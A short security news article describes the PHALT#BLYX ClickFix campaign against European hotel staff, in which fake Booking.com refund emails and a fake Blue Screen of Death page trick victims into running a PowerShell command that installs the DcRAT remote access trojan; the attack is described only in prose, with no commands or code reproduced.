05.01.2026
2 min
707
A new ClickFix social engineering campaign is targeting Europe’s hospitality sector, abusing fake Windows Blue Screen of Death (BSOD) pages to trick employees into manually executing malicious commands on their own systems.
According to Securonix researchers, the campaign tracked as PHALT#BLYX emerged in December 2025. The attack starts with phishing emails impersonating Booking.com cancellation notices that claim a significant refund amount, creating urgency for hotel staff.
Clicking the link leads victims to a high-fidelity clone of the Booking.com website, hosted on a third-party domain. The page accurately mimics the legitimate platform’s branding, colors, fonts, and layout. Embedded JavaScript initially displays a “loading is taking too long” error, then forces the browser into full-screen mode and renders a fake Windows BSOD.
Unlike a real BSOD, the fake screen provides step-by-step recovery instructions, prompting users to open the Windows Run dialog, paste a command from the clipboard, and execute it. This causes victims to run a malicious PowerShell command themselves, which downloads a .NET project, compiles it via the legitimate MSBuild.exe, and deploys malware.
The payload delivered in the campaign is DCRAT (DcRAT), a widely used remote access trojan. Once executed, it adds Windows Defender exclusions, attempts to gain administrative privileges via UAC prompts, downloads additional components through BITS, and establishes persistence via the Startup folder.
The malware is injected into the legitimate
aspnet_compiler.exeprocess and runs entirely in memory. Upon connecting to its command-and-control server, it exfiltrates a full system fingerprint and awaits further instructions, supporting remote desktop access, keylogging, reverse shells, and additional payload deployment, including cryptominers.
This campaign highlights how social engineering continues to outperform technical exploits, especially in high-pressure business environments like hospitality. The use of fake BSOD screens marks a dangerous evolution of ClickFix tactics, enabling full system compromise without exploiting a single software vulnerability.
